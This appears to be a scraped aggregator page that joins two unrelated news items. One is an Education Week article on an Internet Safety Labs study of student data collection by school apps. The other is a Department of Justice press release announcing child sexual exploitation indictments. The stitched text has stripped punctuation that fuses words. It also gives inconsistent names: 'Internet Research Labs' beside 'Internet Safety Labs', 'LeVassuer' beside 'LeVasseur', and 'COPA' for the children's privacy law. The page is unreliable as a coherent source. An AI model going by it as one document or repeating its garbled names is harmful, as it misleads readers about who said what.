Researchers analyzed more than 1,300 apps used in 600 schools across the country looking at what information the appsand the browser versions of those appsare collecting on students and who that information is shared with or sold to.
Not protecting students personal information in the digital space can cause real-world harms, said Lisa LeVasseur, the founder and executive director of Internet Safety Labs and one of the co-authors of the report. Strangers can glean a lot of sensitive information about individuals, she said, from even just their location and calendar data.
Its like pulling a thread, LeVassuer said. Even data that may seem innocuous can be used maliciously, potentiallycertainly in ways unanticipated and undesired. These kids are not signing up for data broker profiles. None of us are, actually.
(Data brokers are companies that collect peoples personal data from various sources, package it together into profiles, and sell it to other companies for marketing purposes.)
Only 29 percent of schools appear to be vetting all apps used by students, the analysis found. Schools that systematically vet all apps were less likely to recommend or require students use apps that feature ads.
But in an unusual twist, those schools that vet their tech were actually more likely to require students use apps with poor safety ratings from the Internet Research Labs. Although LeVassuer said shes not sure why that is the case, it might be because schools with systematic vetting procedures wound up requiring that students use more apps, giving schools a false sense of security that the apps they approved were safe to use.
Its also hard for families to find information online about the technology their children are required to use for school and difficult to opt out of using that tech, according to the report.
Less than half of schools45 percentprovide a technology notice that clearly lists all of the technology products students must use, the researchers found. While not required under federal or most state laws, it is considered a best practice, the report said.
Only 14 percent of schools gave parents and students older than 18 years of age the opportunity to consent to technology use.
Researchers for the Internet Safety Lab also found that apps with the third-party COPA certification called Safe Harborwhich indicates that an app follows federal privacy-protection laws for childrenare frequently sharing student data with the likes of Facebook and Twitter. Safe Harbor certified apps also have more advertising than the overall sample of apps the report examined.
The certification verifies that the apps abstain from some important data privacy practices, like behavioral advertising, said LeVasseur. But school leaders may not be getting the data privacy protection for students that they believe they are.
Third-party certifications may not be doing what you think they are, said LeVassuer.
But overall, apps with third-party certifications, such as 1EdTech, and pledges or promises, such as the Student Privacy Pledge or the Student Data Privacy Consortium, received better data privacy safety ratings under the rubric developed by the Internet Safety Labs.
In all, the Internet Safety Labs examined and tested 1,357 apps that schools across the country either recommend or require students and families to use. It created its sample of apps by assessing the apps recommended or required in a random sample of 13 schools from each of the 50 states and the District of Columbia, totaling 663 schools serving 456,000 students.
While researchers for Internet Safety Labs were only able to analyze the off-the-shelf versions of the apps schools used (they did not have access to school versions of these apps), the group estimates that 8 out of every 10 apps recommended by schools to students are of the off-the-shelf variety.
This is the second report from an ambitious evaluation of the technology used in schools by Internet Safety Labs. The first report, released in December, labeled the vast majority of those apps96 percentas not safe for children to use because they share information with third parties or contain ads.
That report also flagged that the custom-built apps some districts use to communicate with families often have more privacy issues than regular apps.
The big takeaway for school and district leaders? LeVasseur said its to be on high alert.
While new technology can be exciting, and schools might be eager to adopt it, education leaders should be picky about what apps students are required or recommended to use. Less is more should be a guiding star for schools, LeVasseur said.
I really have a lot of sympathy for schools because they need probably a lot more support than they have, given the risks of technology and the confusing nature of the laws at both the state and federal level, she said. I think theyre struggling. I dont think they know what best practices are.
Read this article:
Districts, Take Note: Privacy Is Rare in Apps Used in Schools - Education Week
Two Indictments Charge International Travel to Engage in Illicit … – Department of Justice
SACRAMENTO, Calif. U.S. Attorney Phillip A. Talbert joins with Homeland Security Investigations Special Agent in Charge Tatum King, FBI Special Agent in Charge Sean Ragan, and Kathleen Nicholls, Chief of the Department of Consumer Affairs Division of Investigation to announce indictments charging sexual exploitation of children, a global problem demanding a global response.
The indictments are part of an initiative known as Project Safe Childhood that seeks to prevent the sexual exploitation of children and achieve justice for the victims of such crimes.
To vindicate victims of child exploitation and bring criminals to justice, our law enforcement and our communities must work together in partnership across county, state, and national borders, U.S. Attorney Talbert said. Our office is committed to protect our children and hold offenders accountable.
Homeland Security Investigations SanFrancisco/NorCal and FBI, in partnership with the California Dept of Consumer Affairs and the U.S. Attorneys Office are seeking information on any individuals that may have been victimized by Mr. Reger, said HSISpecial Agent in Charge Tatum King. Of importance, HSI and Law Enforcement partners are focused on providing victim support and holding the alleged violator accountable for his actions in a court of law. We ask the community and media to help magnify this request so that victims, regardless of their current location around the world can be aware of the latest developments in this case.
Child predators prey upon the innocence and naivete of their victims, damaging trust and forever changing the course of their lives. The FBI Sacramento Field Office is determined to thoroughly investigate allegations like these to seek justice and connect identified victims with vital services that can help heal the trauma they have experienced, said Special Agent in Charge Sean Ragan of the FBI Sacramento Field Office. We are grateful for our continued partnership with the Lassen County Sheriffs Office, Lassen County District Attorneys Office, and Homeland Security Investigations. Trust and collaboration are essential to ensuring the safety and security of the communities we serve. We also thank the Church of the Nazarene and California Department of Consumer Affairs for their efforts to aid this investigation.
The California Department of Consumer Affairs is committed to protecting California consumers, said Kathleen Nicholls, Chief of the Department of Consumer Affairs Division of Investigation. We are grateful for our law enforcement partners who share the common goal of taking action against those who violate the law.
Danish Man Alleged to Have Traveled from Denmark to Fresno to Exploit a Minor
A federal grand jury returned a two-count indictment today against Claus Svelmo Marcuslund, 58, of Denmark, charging him with distribution of child pornography and attempted coercion or enticement of a minor to engage in illicit sexual activity.
According to court documents, in January 2023, Marcuslund contacted an undercover agent who had created the profile of a mother with a seven-year-old daughter, on a dark web website dedicated to persons interested in pedophilia. Marcuslund told the agent that Im Scandinavian, professional music producer/songwriter and lyricist and yeah, Im also a pedophile. He also stated that Im divorced and now searching [for] a nice woman/mom to get to know better, hopefully with the potential of getting together in real life one day. Obviously, she must be 100% supportive of pedophilia and incest. During the next several months Marcuslund sent messages to the agent through the websites messaging feature, as well as the fully encrypted Telegram application, that explained in graphic detail the sexual acts in which he hoped to engage with the mother and child. As part of those communications, he sent images of adults sexually abusing young children. He also discussed having another child with the mother and molesting the newborn.
Marcuslund boarded a flight from Copenhagen to the Los Angeles International Airport and then boarded a flight to Fresno. On July 11, 2023, Marcuslund was arrested upon arrival at the Fresno International Airport and has been ordered detained as a risk of flight and danger to the community.
This case is the product of an investigation by Homeland Security Investigations with assistance from the Central Valley Internet Crimes Against Children Task Force. Assistant U.S. Attorney David Gappa is prosecuting the case.
Susanville Man Charged with Multiple Crimes Involving Sexual Abuse of Minors
A federal grand jury returned a five-count indictment today against Bradley Earl Reger, 67, of Susanville, charging him with: engaging in illicit sexual activity abroad, transportation of a minor with intent to engage in criminal sexual activity, and coercion and enticement.
According to court documents, Reger sexually abused more than a dozen patients between the ages of 12 and 22 under the guise of conducting purported medical examinations at his medical clinic in Susanville, and in hotel rooms and camp sites all over the world. Reger is a licensed Nurse Practitioner with the California Board of Registered Nursing and has been since at least 2003. Since at least 1986, Reger has been heavily involved in various Christian schools, summer camps, youth groups, and church missions. He has held positions as a teacher, camp counselor, church deacon, youth group leader, and owner of affiliated nonprofit organizations.
The indictment alleges that Reger sexually abused three different minor victims, in locations such as: Susanville, Nevada, Virginia, and Poland. These offenses allegedly took place between 2006 and 2014.
This case is the product of an investigation by the Federal Bureau of Investigation, Homeland Security Investigations, and the California Department of Consumer Affairs with assistance from the Lassen County Sheriffs Office and the Lassen County District Attorneys Office. Assistant U.S. Attorneys Christina McCall and Roger Yang are prosecuting the case.
The FBI and HSI are seeking to identify potential victims of Bradley Reger. If you believe that you and/or your minor dependent(s) were victimized by Reger at any time, in the United States or abroad, or have information relevant to this investigation, please complete the online form available at: http://www.fbi.gov/RegerVictims. Additionally, if you know of someone else who may have been victimized by Bradley Reger, please encourage them to complete the form.
If convicted, Reger faces a maximum statutory penalty of 30 years in prison and a $250,000 fine for the counts of engaging in illicit sexual conduct abroad, up to life in prison and a fine of $250,000 for transportation with intent to engage in criminal sexual activity, and up to 20 years in prison and a fine of up to $250,000 for coercion and enticement. If convicted, Marcuslund faces a maximum statutory penalty of life in prison and a $250,000 fine.
Any sentence, however, would be determined at the discretion of the court after consideration of any applicable statutory factors and the Federal Sentencing Guidelines, which take into account a number of variables. The charges are only allegations; the defendants are presumed innocent until and unless proven guilty beyond a reasonable doubt.
These cases are brought as part of Project Safe Childhood, a nationwide initiative launched in May2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by the United States Attorneys Offices and the Criminal Divisions Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute those who sexually exploit children, and to identify and rescue victims. For more information about Project Safe Childhood, please visit http://www.usdoj.gov/psc. Click on the resources tab for information about internet-safety education.
Read more:
Two Indictments Charge International Travel to Engage in Illicit ... - Department of Justice